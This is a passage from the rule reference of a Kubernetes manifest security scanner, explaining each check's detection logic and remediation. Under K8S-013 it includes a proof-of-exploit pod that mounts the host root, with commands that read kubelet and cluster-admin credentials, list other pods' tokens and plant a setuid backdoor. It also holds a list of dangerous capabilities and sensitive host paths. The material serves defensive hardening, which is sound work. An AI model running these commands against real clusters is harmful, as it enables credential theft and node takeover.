How this is detected. Reuses _primitives.image_pinning.classify so the floating-tag semantics match DF-001 / GL-001 / JF-009 / ADO-009 / CC-003. Even a PINNED_TAG like nginx:1.25.4 is treated as unpinned (only an explicit @sha256: survives), since a tag is mutable on the registry side and Kubernetes will happily pull the new content on a node restart.
Recommendation. Resolve every workload container image to its current digest (crane digest <ref> or docker buildx imagetools inspect) and pin via image: repo@sha256:<digest>. Floating tags (:latest, :3, no tag) silently swap the running image on the next rollout, breaking provenance and reproducibility.
Autofix. pipeline_check --fix will patch this finding automatically. Review the diff before committing; the fixer applies the conservative remediation pattern (e.g. swap a floating tag for the digest it currently resolves to), not the most aggressive one.
Source: K8S-001 in the Kubernetes provider.
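The three-way classification above can be sketched compactly. The label names and helper are illustrative; the real classify lives in _primitives.image_pinning and may differ.

```python
import re

# Sketch of an image_pinning.classify-style helper:
# only an explicit @sha256: digest counts as pinned.
DIGEST = re.compile(r"@sha256:[0-9a-f]{64}$")

def classify(image: str) -> str:
    if DIGEST.search(image):
        return "DIGEST_PINNED"
    last = image.rsplit("/", 1)[-1]   # skip a ':' inside a registry host:port
    if ":" in last:
        return "PINNED_TAG"           # looks pinned, still mutable server-side
    return "FLOATING"                 # :latest implied
```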
K8S-002: Pod hostNetwork: true HIGH 🔧 fix
Evidences: CC6.6 Boundary-protection measures restrict access from outside the system boundary.
How this is detected. Compromised containers on hostNetwork can sniff or interfere with traffic from every other pod on the node. Reserve the flag for system DaemonSets that genuinely require it (CNI agents, ingress data planes); applications never need it.
Recommendation. Set spec.hostNetwork: false (the default) on every workload. hostNetwork: true puts the pod directly on the node's network namespace, exposing every host-bound listener to the container and bypassing CNI network policies.
Autofix. pipeline_check --fix will patch this finding automatically. Review the diff before committing; the fixer applies the conservative remediation pattern (e.g. swap a floating tag for the digest it currently resolves to), not the most aggressive one.
Source: K8S-002 in the Kubernetes provider.
K8S-003: Pod hostPID: true HIGH 🔧 fix
Evidences: CC6.8 Controls prevent or detect the introduction of malicious software.
How this is detected. There is no application use case for hostPID. Only specialised node agents (process exporters, debuggers) legitimately need it, and those are typically deployed via a system DaemonSet with an explicit security review.
Recommendation. Set spec.hostPID: false (the default) on every workload. hostPID: true makes every host process visible inside the container, and combined with privileged execution allows trivial escape via nsenter / /proc/<pid>/root.
Autofix. pipeline_check --fix will patch this finding automatically. Review the diff before committing; the fixer applies the conservative remediation pattern (e.g. swap a floating tag for the digest it currently resolves to), not the most aggressive one.
Source: K8S-003 in the Kubernetes provider.
K8S-004: Pod hostIPC: true HIGH 🔧 fix
Evidences: CC6.8 Controls prevent or detect the introduction of malicious software.
How this is detected. Modern applications coordinate via gRPC / sockets, never via host IPC. Treat this flag as a strong red flag in code review unless paired with a documented system-level use case.
Recommendation. Set spec.hostIPC: false (the default) on every workload. hostIPC: true lets the container read and write the host's shared-memory segments and POSIX message queues, exposing data exchanged by every other process on the node.
Autofix. pipeline_check --fix will patch this finding automatically. Review the diff before committing; the fixer applies the conservative remediation pattern (e.g. swap a floating tag for the digest it currently resolves to), not the most aggressive one.
Source: K8S-004 in the Kubernetes provider.
K8S-005: Container securityContext.privileged: true CRITICAL 🔧 fix
Evidences: CC6.8 Controls prevent or detect the introduction of malicious software.
How this is detected. privileged: true is the strongest possible escalation in Kubernetes. It overrides every other securityContext setting and is the single largest cluster-takeover vector after RBAC misconfiguration.
Recommendation. Remove securityContext.privileged: true from every container. A privileged container has full access to the host's devices and capabilities; escape to the node is trivial. If the workload genuinely needs a kernel capability, grant only that capability via capabilities.add rather than enabling privileged mode.
Autofix. pipeline_check --fix will patch this finding automatically. Review the diff before committing; the fixer applies the conservative remediation pattern (e.g. swap a floating tag for the digest it currently resolves to), not the most aggressive one.
Source: K8S-005 in the Kubernetes provider.
K8S-006: Container allowPrivilegeEscalation not explicitly false HIGH 🔧 fix
Evidences: CC6.8 Controls prevent or detect the introduction of malicious software.
How this is detected. The default for non-root containers is true (Pod Security Standard 'baseline' allows this; 'restricted' does not). An explicit false is required because Kubernetes treats an unset field as a deferral to the cluster admission controller, which may not enforce restricted.
Recommendation. Set securityContext.allowPrivilegeEscalation: false on every container. The Linux no_new_privs flag stops setuid binaries and capabilities from granting elevated privileges; without it, a compromised process can escalate via the setuid utilities still installed in many base images.
Autofix. pipeline_check --fix will patch this finding automatically. Review the diff before committing; the fixer applies the conservative remediation pattern (e.g. swap a floating tag for the digest it currently resolves to), not the most aggressive one.
Source: K8S-006 in the Kubernetes provider.
K8S-007: Container runAsNonRoot not true / runAsUser is 0 HIGH 🔧 fix
Evidences: CC6.8 Controls prevent or detect the introduction of malicious software.
How this is detected. A container is considered safe when EITHER its own securityContext OR the pod-level securityContext sets runAsNonRoot: true and a non-zero runAsUser. An explicit runAsUser: 0 always fails, even if runAsNonRoot is unset.
Recommendation. Set securityContext.runAsNonRoot: true and runAsUser: <non-zero UID> on every container, OR set the same fields at pod level so all containers inherit. Running as UID 0 inside a container makes container-escape exploits dramatically more dangerous: the attacker already has root inside the container, so any kernel CVE that matters becomes immediately exploitable.
Autofix. pipeline_check --fix will patch this finding automatically. Review the diff before committing; the fixer applies the conservative remediation pattern (e.g. swap a floating tag for the digest it currently resolves to), not the most aggressive one.
Source: K8S-007 in the Kubernetes provider.
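The EITHER/OR evaluation above amounts to overlaying the container's securityContext on the pod's. A minimal sketch; the field names are the Kubernetes API's, the helper itself is an assumption.

```python
# Illustrative restatement of the K8S-007 pass condition:
# container-level securityContext fields override pod-level ones.
def run_as_non_root_ok(pod_sc: dict, container_sc: dict) -> bool:
    eff = {**pod_sc, **container_sc}      # container overrides pod
    if eff.get("runAsUser") == 0:
        return False                      # explicit runAsUser: 0 always fails
    return eff.get("runAsNonRoot") is True and eff.get("runAsUser", 0) != 0
```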
K8S-008: Container readOnlyRootFilesystem not true MEDIUM 🔧 fix
Evidences: CC6.8 Controls prevent or detect the introduction of malicious software.
How this is detected. Many post-exploitation toolchains (cryptominers, persistence implants, shell callbacks) assume a writable root filesystem. Locking it down denies them anywhere durable to drop payloads, forcing memory-only or tmpfs-backed techniques that are harder to stage and don't persist.
Recommendation. Set securityContext.readOnlyRootFilesystem: true on every container. A read-only root filesystem stops attackers from dropping additional payloads into /tmp, /var, or writable system paths. Mount tmpfs emptyDir volumes for the directories the application genuinely needs to write to.
Autofix. pipeline_check --fix will patch this finding automatically. Review the diff before committing; the fixer applies the conservative remediation pattern (e.g. swap a floating tag for the digest it currently resolves to), not the most aggressive one.
Source: K8S-008 in the Kubernetes provider.
K8S-009: Container capabilities not dropping ALL / adding dangerous caps HIGH
Evidences: CC6.8 Controls prevent or detect the introduction of malicious software.
How this is detected. Fails when the container does NOT drop ALL or when capabilities.add includes any of: SYS_ADMIN, NET_ADMIN, SYS_PTRACE, SYS_MODULE, DAC_READ_SEARCH, DAC_OVERRIDE, SYS_RAWIO, SYS_BOOT, BPF, PERFMON, or the literal ALL.
Recommendation. Drop every capability and add back only what the workload actually needs:
securityContext:
capabilities:
drop: ["ALL"]
add: ["NET_BIND_SERVICE"] # only if binding <1024
Most stateless services need no capabilities at all. Avoid SYS_ADMIN (effectively root), SYS_PTRACE (process snooping), NET_ADMIN (raw socket access), and SYS_MODULE (kernel module loading).
Source: K8S-009 in the Kubernetes provider.
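The trigger condition can be restated directly. The dangerous-capability set is copied from the rule text above; the helper name is illustrative.

```python
# Direct restatement of the K8S-009 decision: pass only when ALL is dropped
# and nothing dangerous is added back.
DANGEROUS = {"SYS_ADMIN", "NET_ADMIN", "SYS_PTRACE", "SYS_MODULE",
             "DAC_READ_SEARCH", "DAC_OVERRIDE", "SYS_RAWIO", "SYS_BOOT",
             "BPF", "PERFMON", "ALL"}

def capabilities_ok(caps: dict) -> bool:
    drops = {c.upper() for c in caps.get("drop", [])}
    adds = {c.upper() for c in caps.get("add", [])}
    return "ALL" in drops and not (adds & DANGEROUS)
```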
K8S-010: Container seccompProfile not RuntimeDefault or Localhost MEDIUM
Evidences: CC6.8 Controls prevent or detect the introduction of malicious software.
How this is detected. Pod-level securityContext.seccompProfile covers all containers in the pod; a container-level setting covers just that container. Either path passes this rule. A profile of Unconfined, or an unset field (which inherits the node default, usually Unconfined), fails.
Recommendation. Set securityContext.seccompProfile.type: RuntimeDefault (or Localhost with a path to your tuned profile) at either pod or container level. Without seccomp, every syscall is reachable from the container; modern kernel CVEs (e.g. io_uring) become trivially exploitable.
Source: K8S-010 in the Kubernetes provider.
K8S-011: Pod serviceAccountName unset or 'default' MEDIUM
Evidences: CC6.1 Logical access controls restrict entities to authorized system resources.
How this is detected. Both an unset serviceAccountName (which defaults to default) and an explicit serviceAccountName: default fail the rule. Pair this with K8S-012 to also disable token auto-mounting where the workload doesn't need API access.
Recommendation. Bind every workload to a dedicated, narrow ServiceAccount. The 'default' SA exists in every namespace and tends to accrete RoleBindings over time; using it gives the workload every privilege any other service in the namespace ever needed. Create a per-workload SA with the minimum RBAC needed and reference it via spec.serviceAccountName.
Source: K8S-011 in the Kubernetes provider.
K8S-012: Pod automountServiceAccountToken not false MEDIUM
Evidences: CC6.1 Logical access controls restrict entities to authorized system resources.
How this is detected. An unset value defaults to true in Kubernetes. This rule fails on unset because most application workloads do NOT need API access and the default exposes credentials by accident. Workloads that explicitly call the API should set the field to true so the choice is visible in code review.
Recommendation. Set spec.automountServiceAccountToken: false on every workload that doesn't need to talk to the Kubernetes API. Auto-mounted SA tokens are a free credential for an attacker who lands a shell; without the explicit opt-out, the token sits at /var/run/secrets/kubernetes.io/serviceaccount/token ready to be exfiltrated. If the workload needs API access, leave it true but pair with a tight, dedicated RBAC role.
Source: K8S-012 in the Kubernetes provider.
K8S-013: Pod uses a hostPath volume HIGH 🔧 fix
Evidences: CC6.8 Controls prevent or detect the introduction of malicious software.
How this is detected. Some legitimate system DaemonSets need hostPath (log collectors, CSI node plugins). Those should be deployed with explicit security review and a narrow path:; this rule fires regardless because application workloads should never use hostPath.
Recommendation. Replace hostPath volumes with configMap, secret, emptyDir, persistentVolumeClaim, or CSI volumes. hostPath opens a direct read/write window onto the node's filesystem; combined with even mild container compromise it gives the attacker access to other pods' data, kubelet credentials, and the container runtime.
Autofix. pipeline_check --fix will patch this finding automatically. Review the diff before committing; the fixer applies the conservative remediation pattern (e.g. swap a floating tag for the digest it currently resolves to), not the most aggressive one.
Seen in the wild.
- CVE-2021-25741 (Kubernetes subpath symlink escape): a container with hostPath plus subPath could traverse outside the volume boundary and read or modify arbitrary host files. Exploitable on any cluster permitting hostPath for non-system workloads.
- TeamTNT / Kinsing crypto-jacking campaigns (2020-2022): cluster-compromise reports repeatedly traced lateral movement from a single misconfigured pod to the underlying node via a hostPath mount of /, then to kubelet credentials and other tenants. Sysdig and Aqua incident reports document the pattern.
Proof of exploit.
Vulnerable: pod mounts the host's root filesystem.
apiVersion: v1
kind: Pod
metadata:
  name: attacker
spec:
  containers:
  - name: shell
    image: busybox
    command: ["sleep", "infinity"]
    volumeMounts:
    - name: host-root
      mountPath: /host
  volumes:
  - name: host-root
    hostPath:
      path: /   # full node filesystem
Attack from a shell inside the container:
# Read kubelet credentials and pivot to API server:
cat /host/var/lib/kubelet/kubeconfig
cat /host/etc/kubernetes/admin.conf
# Read service account tokens for every other pod on
# the node and impersonate them:
ls /host/var/lib/kubelet/pods/*/volumes/kubernetes.io~projected/*/token
# Drop a setuid binary and pin persistence on the host:
cp /bin/busybox /host/usr/local/bin/.bd
chmod 4755 /host/usr/local/bin/.bd
Safe: use scoped volume types that don't bridge to the host.
spec:
  volumes:
  - name: data
    persistentVolumeClaim:
      claimName: app-data
Source: K8S-013 in the Kubernetes provider.
K8S-014: Pod hostPath references a sensitive host directory CRITICAL
Evidences: CC6.8 Controls prevent or detect the introduction of malicious software.
How this is detected. Stricter than K8S-013: that rule flags any hostPath; this one upgrades to CRITICAL when the path is one of the well-known cluster-escape vectors.
Recommendation. Never mount the container runtime socket (/var/run/docker.sock, containerd.sock, crio.sock), kubelet credentials (/var/lib/kubelet), the cluster config (/etc/kubernetes), the host root (/), or /proc, /sys, or /etc into a workload container. Each of these is a one-line cluster takeover. If a container genuinely needs node-level metrics, use an exporter DaemonSet with a narrowly-scoped read-only mount.
Source: K8S-014 in the Kubernetes provider.
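The escalation paths named above reduce to a prefix check. This is an illustrative sketch; the shipped rule's exact list and path normalisation may differ.

```python
# Illustrative K8S-014-style check over the sensitive host directories
# named in the recommendation above.
SENSITIVE = ("/var/run/docker.sock", "/run/containerd/containerd.sock",
             "/var/lib/kubelet", "/etc/kubernetes", "/proc", "/sys", "/etc")

def is_sensitive_host_path(path: str) -> bool:
    norm = path.rstrip("/") or "/"
    if norm == "/":
        return True  # host root is always a cluster-escape vector
    return any(norm == p or norm.startswith(p + "/") for p in SENSITIVE)
```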
K8S-017: Container env value carries a credential-shaped literal CRITICAL
Evidences: CC6.1 Logical access controls restrict entities to authorized system resources.
How this is detected. Reuses _primitives/secret_shapes: AKIA-prefixed AWS access keys are flagged outright, and credential-named keys (API_KEY, DB_PASSWORD, SECRET_TOKEN) are flagged when the value is a non-empty literal. valueFrom entries are always safe (no inline value).
Recommendation. Replace literal env[].value entries that hold credentials with env[].valueFrom.secretKeyRef or envFrom.secretRef. A literal env value lives in the manifest YAML. It gets committed to git, surfaced by kubectl get pod -o yaml, and embedded in audit logs. Externalising into a Secret (and ideally a SealedSecret / ExternalSecret / SOPS-encrypted source) keeps the value out of the manifest.
Source: K8S-017 in the Kubernetes provider.
K8S-018: Secret stringData/data carries a credential-shaped literal CRITICAL
Evidences: CC6.1 Logical access controls restrict entities to authorized system resources.
How this is detected. Walks both stringData (plain text) and data (base64). Base64-encoded values are decoded and checked for AKIA-shaped AWS keys. Credential-shaped key NAMES with any non-empty value are flagged regardless of encoding; even if the value is the literal placeholder REPLACE_ME, having the name in the manifest is a maintenance footgun.
Recommendation. A kind: Secret manifest committed to git defeats every secret-management story Kubernetes claims to provide: the base64 encoding in data is not encryption. Replace with SealedSecrets (Bitnami), ExternalSecrets / ESO, SOPS-encrypted manifests, or HashiCorp Vault Agent injection. If the manifest must remain in git, the only acceptable contents are placeholders that are filled in by an operator at apply time.
Source: K8S-018 in the Kubernetes provider.
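The stringData/data walk can be sketched like this. The regexes and helper name are assumptions for illustration; the real shapes live in _primitives/secret_shapes.

```python
import base64
import re

# Sketch of a K8S-018-style walk: decode base64 data values before matching,
# and flag credential-shaped key names with any non-empty value outright.
AKIA = re.compile(r"\bAKIA[0-9A-Z]{16}\b")
CRED_KEY = re.compile(r"(?i)(password|secret|token|api[_-]?key)")

def secret_findings(manifest: dict) -> list[str]:
    hits = []
    for key, val in manifest.get("stringData", {}).items():
        if val and (CRED_KEY.search(key) or AKIA.search(val)):
            hits.append(key)
    for key, val in manifest.get("data", {}).items():
        try:
            decoded = base64.b64decode(val).decode("utf-8", "replace")
        except Exception:
            decoded = ""
        if val and (CRED_KEY.search(key) or AKIA.search(decoded)):
            hits.append(key)
    return hits
```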
K8S-019: Workload deployed in the 'default' namespace LOW
Evidences: CC6.1 Logical access controls restrict entities to authorized system resources.
How this is detected. Severity is LOW because in a well-curated cluster the default namespace is empty by policy. If your cluster treats default as a sandbox you can suppress this rule via .pipelinecheckignore.
Recommendation. Set metadata.namespace to a dedicated namespace per workload (or per environment). The default namespace tends to accumulate cluster-wide RoleBindings, NetworkPolicies, and operators that grant broader access than intended; placing application workloads there means every privilege grant in default applies to them. A purpose-built namespace also lets you enforce Pod Security Standards (pod-security.kubernetes.io/enforce label) scoped to that workload.
Source: K8S-019 in the Kubernetes provider.
K8S-020: ClusterRoleBinding grants cluster-admin or system:masters CRITICAL 🔧 fix
Evidences: CC6.1 Logical access controls restrict entities to authorized system resources.
How this is detected. The rule fires on a ClusterRoleBinding whose roleRef.name is cluster-admin, admin, or system:masters. Subject type does not matter; even binding cluster-admin to a Group is a cluster-takeover risk.
Recommendation. Replace cluster-admin / system:masters bindings with narrowly-scoped ClusterRoles or namespace-scoped Roles. Granting cluster-admin to a service account is equivalent to giving every pod that uses it root on every node; credential theft from any such pod becomes immediate cluster takeover. Audit-log every existing cluster-admin binding and replace each with the minimum verbs/resources the consumer actually needs.
Autofix. pipeline_check --fix will patch this finding automatically. Review the diff before committing; the fixer applies the conservative remediation pattern (e.g. swap a floating tag for the digest it currently resolves to), not the most aggressive one.
Seen in the wild.
- Tesla Kubernetes dashboard compromise (RedLock, 2018): an unauthenticated Kubernetes dashboard exposed to the internet held tokens for service accounts bound to cluster-admin. Attackers used the dashboard credentials to deploy crypto-mining workloads with full cluster access. Least-privilege RBAC would have capped the blast radius even after dashboard exposure.
- Argo CD CVE-2022-24348 / CVE-2022-24768 chain (2022): directory traversal plus a default cluster-admin install let any project member exfiltrate cluster-wide secrets. Argo's recommendation post-fix was to scope the controller's RBAC away from cluster-admin so a similar future bug couldn't escalate the same way.
Source: K8S-020 in the Kubernetes provider.
K8S-021: Role or ClusterRole grants wildcard verbs+resources HIGH
Evidences: CC6.1 Logical access controls restrict entities to authorized system resources.
How this is detected. Fires on any rule entry where BOTH verbs and resources contain a literal "*". A wildcard in only one of the two is still risky but is often a legitimate read-everything pattern (e.g. monitoring); this rule targets the strict superset 'do anything to everything'.
Recommendation. Replace verbs: ["*"] and resources: ["*"] with explicit lists. Wildcards bypass the principle of least privilege: today they grant read pods and tomorrow they grant delete crds because a new resource was registered in that apiGroup. Explicit verbs (get, list, watch) and explicit resources (configmaps, services) keep grants stable across cluster upgrades.
Source: K8S-021 in the Kubernetes provider.
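The trigger above restates directly in code (helper name illustrative):

```python
# K8S-021 trigger: a rule entry fails only when BOTH verbs and resources
# contain the literal "*" -- a wildcard in just one list passes this rule.
def wildcard_rule(rule: dict) -> bool:
    return "*" in rule.get("verbs", []) and "*" in rule.get("resources", [])
```

A monitoring-style read-everything rule (explicit verbs, wildcard resources) therefore passes, matching the carve-out described above.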
K8S-022: Service exposes SSH (port 22) MEDIUM
Evidences: CC6.6 Boundary-protection measures restrict access from outside the system boundary.
How this is detected. Mirrors DF-013 (EXPOSE 22 in a Dockerfile) at the Service level. The check fires on Service ports whose port or targetPort is 22, regardless of Service type: a NodePort/LoadBalancer on 22 is dramatically worse, but a ClusterIP on 22 still indicates an sshd container somewhere.
Recommendation. Containers should not run sshd. If you need an interactive shell into a running pod, use kubectl exec (subject to RBAC) or kubectl debug. Removing the port-22 Service removes a pre-auth network surface that's a frequent lateral-movement target after initial cluster compromise.
Source: K8S-022 in the Kubernetes provider.
K8S-023: Namespace missing Pod Security Admission enforcement label HIGH
Evidences: CC7.1 Detection procedures identify configuration changes that introduce vulnerabilities.
How this is detected. Pod Security Admission (PSA) replaced PodSecurityPolicy, which was deprecated in 1.21 and removed in 1.25. The three levels are privileged, baseline, and restricted; baseline is a sensible production default and restricted matches the spirit of K8S-005..010. kube-system is exempt by convention since control-plane pods may legitimately need elevated permissions.
Recommendation. Set metadata.labels.pod-security.kubernetes.io/enforce to baseline or restricted on every Namespace. Without an enforce label the namespace runs the cluster's default policy, which on most installations is privileged and silently admits pods that violate every K8S-002..010 rule.
Known false positives.
- Single-tenant clusters running only operator-managed workloads may apply PSA via an admission webhook instead. The label-based check can't see that.
Source: K8S-023 in the Kubernetes provider.
K8S-024: Container missing both livenessProbe and readinessProbe MEDIUM
Evidences: CC7.2 System components are monitored for anomalies indicative of malicious acts or failures.
How this is detected. Init containers and ephemeral debug containers are exempt; neither makes sense to probe. Jobs and CronJobs are also exempt because Kubernetes treats them as one-shot work; completion is the lifecycle signal, not health.
Recommendation. Define at least one of livenessProbe or readinessProbe on every long-running container. Without probes, a wedged pod stays listed as Running and keeps receiving traffic, which masks incidents and amplifies the blast radius of a single faulty replica.
Source: K8S-024 in the Kubernetes provider.
K8S-026: LoadBalancer Service has no loadBalancerSourceRanges HIGH
Evidences: CC6.6 Boundary-protection measures restrict access from outside the system boundary.
How this is detected. Internal-only services should use type: ClusterIP (and an Ingress for HTTP) or set the cloud-provider-specific internal-LB annotation. loadBalancerSourceRanges is the Kubernetes-native, cloud-portable way to scope an external LB; cloud-specific firewalls (AWS security groups, GCP firewall rules) are equivalent at the L4 level but invisible to a manifest scanner.
Recommendation. Restrict every Service of type: LoadBalancer with spec.loadBalancerSourceRanges. The default behavior is to provision an internet-facing load balancer that accepts traffic from 0.0.0.0/0, which exposes whatever the Service fronts to the entire internet. A short list of CIDRs scoped to known clients (office IPs, a NAT gateway, peered VPCs) removes the pre-auth attack surface entirely.
Source: K8S-026 in the Kubernetes provider.
K8S-027: Ingress has no TLS configuration MEDIUM
Evidences: CC6.7 Data in transit is protected from unauthorized disclosure.
How this is detected. An Ingress with no spec.tls (or an empty list) terminates HTTP at the load balancer and proxies plaintext upstream. Ingress controllers will respect ssl-redirect annotations, but those are advisory until tls: is populated. If the Ingress is intentionally HTTP-only (e.g. an ACME challenge endpoint or an internal-only path served behind a network policy), suppress via .pipelinecheckignore with a short rationale rather than leaving it open.
Recommendation. Add a spec.tls block to every Ingress that fronts an HTTP backend. Each entry pairs one or more hostnames with a Secret holding the certificate / key; the canonical pattern is to provision the Secret via cert-manager and a ClusterIssuer pointing at Let's Encrypt or an internal CA. Plaintext-only Ingress lets a network attacker downgrade the connection and read or rewrite request bodies, which matters for any path carrying credentials, session cookies, or PII.
Source: K8S-027 in the Kubernetes provider.
K8S-028: Container declares hostPort MEDIUM 🔧 fix
Evidences: CC6.6 Boundary-protection measures restrict access from outside the system boundary.
How this is detected. hostPort was the pre-Service way to publish a pod's port and survives in legacy manifests. Modern clusters use Services, which integrate with kube-proxy, ingress controllers, and NetworkPolicies. hostPort is invisible to all of those: a port-scan from any other pod that knows the node IP reaches the workload directly. If a DaemonSet legitimately needs it (host-agent shape), suppress this rule with a brief .pipelinecheckignore rationale rather than leaving it open across the catalog.
Recommendation. Drop hostPort from container ports and use a Service (ClusterIP / NodePort / LoadBalancer) to publish the workload. hostPort binds directly to the node IP, bypasses the cluster's network model, and creates a node-level scheduling constraint that fails replicas with the same port. Workloads that genuinely need node-port binding (some CNI/storage agents) should declare it on a DaemonSet with hostNetwork: true already approved by review.
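A sketch of the replacement shape, with the failing field shown as a comment; the names and ports are illustrative:

```yaml
# Before (failing): the container binds the node IP directly.
#   ports:
#     - containerPort: 8080
#       hostPort: 8080
#
# After: drop hostPort and publish via a Service instead.
apiVersion: v1
kind: Service
metadata:
  name: web                 # hypothetical
spec:
  type: ClusterIP
  selector:
    app: web
  ports:
    - port: 80
      targetPort: 8080      # the containerPort, reached via the Service
```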
Autofix. pipeline_check --fix will patch this finding automatically. Review the diff before committing; the fixer applies the conservative remediation pattern (e.g. swap a floating tag for the digest it currently resolves to), not the most aggressive one.
Source: K8S-028 in the Kubernetes provider.
K8S-029: RoleBinding grants permissions to the default ServiceAccount HIGH 🔧 fix
Evidences: CC6.1 Logical access controls restrict entities to authorized system resources.
How this is detected. Fires when a RoleBinding or ClusterRoleBinding lists kind: ServiceAccount, name: default among its subjects. kube-system, kube-public, and kube-node-lease are exempt because control-plane bootstrap manifests legitimately grant the default SA there.
Recommendation. Bind permissions to a dedicated ServiceAccount, not to default. Every pod that omits serviceAccountName runs as the namespace's default SA, so a binding to it grants the same verbs to every untargeted pod in that namespace, including future workloads. Create a purpose-built SA, set automountServiceAccountToken: false on the default, and bind to the new SA explicitly.
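A sketch of the three-part fix; the namespace, SA name, and the referenced Role (web-deployer-role, assumed to exist) are illustrative:

```yaml
apiVersion: v1
kind: ServiceAccount
metadata:
  name: web-deployer        # purpose-built SA, name illustrative
  namespace: app
---
apiVersion: v1
kind: ServiceAccount
metadata:
  name: default
  namespace: app
automountServiceAccountToken: false   # default SA keeps no API token
---
apiVersion: rbac.authorization.k8s.io/v1
kind: RoleBinding
metadata:
  name: web-deployer-binding
  namespace: app
subjects:
  - kind: ServiceAccount
    name: web-deployer      # bind the named SA, never "default"
    namespace: app
roleRef:
  apiGroup: rbac.authorization.k8s.io
  kind: Role
  name: web-deployer-role   # assumed to be defined elsewhere
```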
Autofix. pipeline_check --fix will patch this finding automatically. Review the diff before committing; the fixer applies the conservative remediation pattern (e.g. swap a floating tag for the digest it currently resolves to), not the most aggressive one.
Known false positives.
- Charts that intentionally re-use the default SA in single-tenant namespaces. Consider creating a named SA anyway. It keeps the audit log unambiguous about which workload made an API call.
Source: K8S-029 in the Kubernetes provider.
K8S-031: Namespace missing PSA warn label LOW
Evidences: CC7.1 Detection procedures identify configuration changes that introduce vulnerabilities.
How this is detected. Pod Security Admission supports three modes: enforce (reject), audit (log to API audit), and warn (return a kubectl warning). K8S-023 covers enforce; this rule covers warn. The convention from upstream PSA docs is to set warn to the next-strictest tier above your current enforce so an upgrade from baseline to restricted is a predictable rollout, not a surprise.
Recommendation. Set metadata.labels.pod-security.kubernetes.io/warn on every Namespace, ideally one tier ahead of the enforce label (e.g. enforce: baseline + warn: restricted). The warn level surfaces violations as kubectl apply warnings without rejecting the resource; developers see what would break before an enforcement upgrade lands.
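The one-tier-ahead pattern looks like this; the namespace name is illustrative:

```yaml
apiVersion: v1
kind: Namespace
metadata:
  name: app
  labels:
    pod-security.kubernetes.io/enforce: baseline
    pod-security.kubernetes.io/audit: restricted
    pod-security.kubernetes.io/warn: restricted   # one tier ahead of enforce
```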
Known false positives.
- Single-tenant clusters may set warn and audit globally via the AdmissionConfiguration defaults: block instead of per-namespace labels. The label-based check can't see that.
Source: K8S-031 in the Kubernetes provider.
K8S-032: Namespace lacks default-deny NetworkPolicy MEDIUM
Evidences: CC6.6 Boundary-protection measures restrict access from outside the system boundary.
How this is detected. Kubernetes' default network model is allow-everything: without any NetworkPolicy targeting a namespace, every pod can talk to every other pod across every namespace, and every pod can reach the internet. A default-deny policy flips the default to deny, so the only flows that work are those an explicit allow policy permits. The check fires on namespaces declared in the manifest set that have at least one workload but no default-deny NetworkPolicy covering them. Cross-doc correlation: it walks the full manifest stream to match Namespace/workload/NetworkPolicy across files.
Recommendation. Apply a default-deny NetworkPolicy in every namespace that carries workloads. The canonical shape is podSelector: {} (matches every pod) plus policyTypes: [Ingress, Egress] with no ingress: / egress: rules; every flow is denied unless a more permissive NetworkPolicy in the same namespace explicitly allows it. Pair with per-workload allow-list policies for the flows the application actually needs.
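The canonical default-deny shape described above, in full; only the name and namespace are illustrative:

```yaml
apiVersion: networking.k8s.io/v1
kind: NetworkPolicy
metadata:
  name: default-deny-all
  namespace: app
spec:
  podSelector: {}                     # selects every pod in the namespace
  policyTypes: [Ingress, Egress]
  # No ingress:/egress: rules: all flows are denied until another
  # NetworkPolicy in this namespace explicitly allows them.
```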
Known false positives.
- Mesh-managed clusters (Istio, Linkerd, Cilium ClusterMesh) often delegate L4 default-deny to the mesh's authorization policy. The check only looks at native NetworkPolicy and won't see that.
- kube-system / kube-public / kube-node-lease are exempt; control-plane components frequently need open networking and have their own admission-time guards.
Source: K8S-032 in the Kubernetes provider.
K8S-033: Namespace lacks ResourceQuota or LimitRange MEDIUM
Evidences: CC7.2 System components are monitored for anomalies indicative of malicious acts or failures.
How this is detected. Without a ResourceQuota, a single namespace can consume the cluster's entire scheduling capacity: a fork bomb in a CronJob, a memory leak in a Deployment, or a cryptominer that landed via a fork-PR build can starve every other tenant. Without a LimitRange, individual pods without explicit resources: requests get a default of zero; the scheduler treats them as best-effort and packs them onto any node, including ones already at memory pressure. The two work together: quota caps the aggregate, range caps the per-workload baseline. Cross-doc correlation: walks the manifest stream to match Namespace / workload / ResourceQuota / LimitRange across files.
Recommendation. Apply a ResourceQuota and a LimitRange to every namespace that hosts application workloads. ResourceQuota caps the namespace's total CPU / memory / pod / object consumption; LimitRange enforces per-pod request / limit defaults so a workload that forgets to declare its own doesn't get unbounded scheduling. Together they bound the blast radius of a runaway, leaky, or attacker-driven pod explosion to a single namespace.
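A sketch of the paired controls; every number here is an illustrative budget, not a recommendation for any particular workload:

```yaml
apiVersion: v1
kind: ResourceQuota
metadata:
  name: app-quota
  namespace: app
spec:
  hard:                        # caps the namespace's aggregate consumption
    requests.cpu: "8"
    requests.memory: 16Gi
    limits.cpu: "16"
    limits.memory: 32Gi
    pods: "50"
---
apiVersion: v1
kind: LimitRange
metadata:
  name: app-defaults
  namespace: app
spec:
  limits:
    - type: Container
      defaultRequest:          # applied when a container omits requests
        cpu: 100m
        memory: 128Mi
      default:                 # applied when a container omits limits
        cpu: 500m
        memory: 512Mi
```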
Source: K8S-033 in the Kubernetes provider.
K8S-034: ServiceAccount automountServiceAccountToken not explicitly false MEDIUM
Evidences: CC6.1 Logical access controls restrict entities to authorized system resources.
How this is detected. K8S-012 covers the pod-level automountServiceAccountToken setting; this rule covers the same control at the ServiceAccount level. The two are complementary: the SA-level default flips the cluster-wide baseline (true -> false), the pod-level override re-enables only where needed. Without the SA-level disable, every pod that doesn't set its own override mounts a token that can call the K8s API as that SA, a useful credential for an attacker who lands code in any pod, regardless of the workload's own intent.
Recommendation. Set automountServiceAccountToken: false at the ServiceAccount level for every SA that doesn't actively need to call the Kubernetes API. The pods that legitimately do (operators, sidecars that read namespaces, controllers) can opt back in per-pod via spec.automountServiceAccountToken: true. The default is mount-everywhere, which is the wrong direction for least privilege.
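A sketch of the default-off, opt-back-in pattern; the SA, pod, and image names are illustrative:

```yaml
apiVersion: v1
kind: ServiceAccount
metadata:
  name: web                   # ordinary workload SA: no API access needed
  namespace: app
automountServiceAccountToken: false
---
# A workload that genuinely calls the Kubernetes API opts back in per-pod.
apiVersion: v1
kind: Pod
metadata:
  name: operator
  namespace: app
spec:
  serviceAccountName: operator-sa          # dedicated SA for the operator
  automountServiceAccountToken: true       # pod-level override wins
  containers:
    - name: operator
      image: registry.example.com/operator:v1.2.3
```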
Known false positives.
